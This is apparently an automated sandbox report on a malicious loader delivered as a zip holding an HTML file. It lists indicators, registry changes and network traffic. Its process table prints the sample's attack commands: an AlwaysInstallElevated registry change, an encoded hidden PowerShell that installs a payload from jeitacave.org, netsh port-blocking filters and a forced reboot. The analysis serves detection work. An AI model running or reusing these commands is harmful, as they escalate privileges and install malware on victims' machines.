| File name: | test.zip |
| Full analysis: | https://app.any.run/tasks/94361e03-cbb1-4b77-880c-8f37358e7968 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | September 19, 2019, 06:48:09 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract |
| MD5: | 5D8D6DE64947112A32F116883196A601 |
| SHA1: | D02D38556987B8AE44D3FD550C5AF311AB3E2B0C |
| SHA256: | 3FAE463DA72B3C456373763A2F0FF06538859DE2F16678F6D8748436DC71C4B6 |
| SSDEEP: | 96:SiBRGyETgMWEOHHFvWqMlnMMpT5VN3W7X+ouUk8C4+rH8EE1keS1jn2YpXedf1Bt:ZRGRSMhlF7eu2NCt4EEG1L2+XeITHYf |
MALICIOUS
Starts Visual C# compiler
- powershell.exe (PID: 1260)
Executes PowerShell scripts
- mshta.exe (PID: 2684)
Known privilege escalation attack
- powershell.exe (PID: 2536)
Downloads executable files from the Internet
- msiexec.exe (PID: 3836)
Disables Windows Defender
- msiexec.exe (PID: 3836)
SUSPICIOUS
Starts Internet Explorer
- WinRAR.exe (PID: 3564)
Creates files in the user directory
- powershell.exe (PID: 1260)
- mshta.exe (PID: 2684)
- powershell.exe (PID: 2536)
- powershell.exe (PID: 2528)
- powershell.exe (PID: 3152)
Starts MSHTA.EXE for opening HTA or HTMLS files
- iexplore.exe (PID: 4028)
Starts CMD.EXE for commands execution
- Eventvwr.exe (PID: 2624)
Executable content was dropped or overwritten
- msiexec.exe (PID: 3836)
Uses NETSH.EXE for network configuration
- MsiExec.exe (PID: 2340)
Executes PowerShell scripts
- MsiExec.exe (PID: 2544)
- MSI4A21.tmp (PID: 2056)
- powershell.exe (PID: 2536)
Reads Environment values
- MsiExec.exe (PID: 2544)
Creates files in the Windows directory
- msiexec.exe (PID: 3836)
Creates or modifies windows services
- netsh.exe (PID: 3984)
Uses REG.EXE to modify Windows registry
- cmd.exe (PID: 3364)
Application launched itself
- powershell.exe (PID: 2536)
Modifies the open verb of a shell class
- powershell.exe (PID: 2536)
INFO
Reads internet explorer settings
- iexplore.exe (PID: 4028)
- mshta.exe (PID: 2684)
- iexplore.exe (PID: 2652)
Changes internet zones settings
- iexplore.exe (PID: 3612)
Reads Internet Cache Settings
- iexplore.exe (PID: 3612)
Application was crashed
- iexplore.exe (PID: 4028)
Application launched itself
- iexplore.exe (PID: 3612)
- msiexec.exe (PID: 3836)
Writes to a desktop.ini file (may be used to cloak folders)
- msiexec.exe (PID: 3836)
Application was dropped or rewritten from another process
- MSI4A21.tmp (PID: 2056)
Loads dropped or rewritten executable
- MsiExec.exe (PID: 2544)
Starts application with an unusual extension
- msiexec.exe (PID: 3836)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | - |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2019:09:19 09:42:02 |
| ZipCRC: | 0xf547b209 |
| ZipCompressedSize: | 7849 |
| ZipUncompressedSize: | 42608 |
| ZipFileName: | test.html |
Total processes
111
Monitored processes
44
Malicious processes
7
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 552 | reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f | C:\Windows\system32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1260 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAG0AcwBpAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAEkAbgBzAHQAYQBsAGwAUAByAG8AZAB1AGMAdAAoAHMAdAByAGkAbgBnACAAcABhAGMAawBhAGcAZQBQAGEAdABoACwAIABzAHQAcgBpAG4AZwAgAGMAbwBtAG0AYQBuAGQATABpAG4AZQApADsADQAKAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKABpAG4AdAAgAGQAdwBVAEkATABlAHYAZQBsACwAIABJAG4AdABQAHQAcgAgAHAAaABXAG4AZAApADsADQAKAH0ADQAKAA0ACgAiAEAADQAKAFsAbQBzAGkAXQA6ADoATQBzAGkAUwBlAHQASQBuAHQAZQByAG4AYQBsAFUASQAoADIALAAwACkAOwANAAoAWwBtAHMAaQBdADoAOgBNAHMAaQBJAG4AcwB0AGEAbABsAFAAcgBvAGQAdQBjAHQAKAAiAGgAdAB0AHAAOgAvAC8AagBlAGkAdABhAGMAYQB2AGUALgBvAHIAZwAvADEAVQAyADIAbgBPAEoASABGAGQARABtAFkAYwBnAEMAUwAuAGoAcABnACIALAAiACIAKQANAAoAZQB4AGkAdAANAAoA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1424 | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8443 protocol=TCP | C:\Windows\System32\netsh.exe | — | MsiExec.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Network Command Shell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1648 | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP | C:\Windows\System32\netsh.exe | — | MsiExec.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Network Command Shell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2056 | "C:\Windows\Installer\MSI4A21.tmp" /DontWait /HideWindow "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 600; Restart-Computer -Force | C:\Windows\Installer\MSI4A21.tmp | — | msiexec.exe | |||||||||||
User: admin Company: Caphyon LTD Integrity Level: MEDIUM Description: File that launches another file Exit code: 4294967295 Version: 14.8.0.0 Modules
| |||||||||||||||
| 2188 | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP | C:\Windows\System32\netsh.exe | — | MsiExec.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Network Command Shell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2200 | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP | C:\Windows\System32\netsh.exe | — | MsiExec.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Network Command Shell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2288 | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP | C:\Windows\System32\netsh.exe | — | MsiExec.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Network Command Shell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2336 | "C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block | C:\Windows\System32\netsh.exe | — | MsiExec.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Network Command Shell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2340 | C:\Windows\system32\MsiExec.exe -Embedding 81C0B1C00563B689A3715F5CD4D9179A M Global\MSI0000 | C:\Windows\system32\MsiExec.exe | — | msiexec.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
3 626
Read events
1 916
Write events
1 691
Delete events
19
Modification events
| (PID) Process: | (3564) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3564) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3564) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3564) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\test.zip | |||
| (PID) Process: | (3564) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3564) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3564) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (3564) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (3612) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
| Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
| (PID) Process: | (3612) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
Executable files
5
Suspicious files
10
Text files
16
Unknown types
4
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3612 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
| 3612 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
| 2536 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F5I1QDH0MTRWM6YAY1AW.temp | — | |
MD5:— | SHA256:— | |||
| 3612 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF61337B47EBFD912D.TMP | — | |
MD5:— | SHA256:— | |||
| 3612 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{829A1EE0-DAA9-11E9-B86F-5254004A04AF}.dat | — | |
MD5:— | SHA256:— | |||
| 1260 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6DXAI1ZM92V69QS5HW3I.temp | — | |
MD5:— | SHA256:— | |||
| 1260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\fxbnopas.0.cs | — | |
MD5:— | SHA256:— | |||
| 1260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\fxbnopas.cmdline | — | |
MD5:— | SHA256:— | |||
| 3300 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC11F1.tmp | — | |
MD5:— | SHA256:— | |||
| 3300 | csc.exe | C:\Users\admin\AppData\Local\Temp\fxbnopas.pdb | — | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
2
Threats
5
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2536 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/ps001.jpg | US | text | 81.6 Kb | malicious |
3836 | msiexec.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/1U22nOJHFdDmYcgCS.jpg | US | executable | 3.43 Mb | malicious |
2684 | mshta.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/hta.hta | US | html | 466 b | malicious |
3612 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3612 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
2536 | powershell.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
2684 | mshta.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
3836 | msiexec.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.bing.com |
| whitelisted |
jeitacave.org |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2684 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
2684 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
3836 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |
3836 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] PE as Image Content type mismatch |
1 ETPRO signatures available at the full report
Process | Message |
|---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|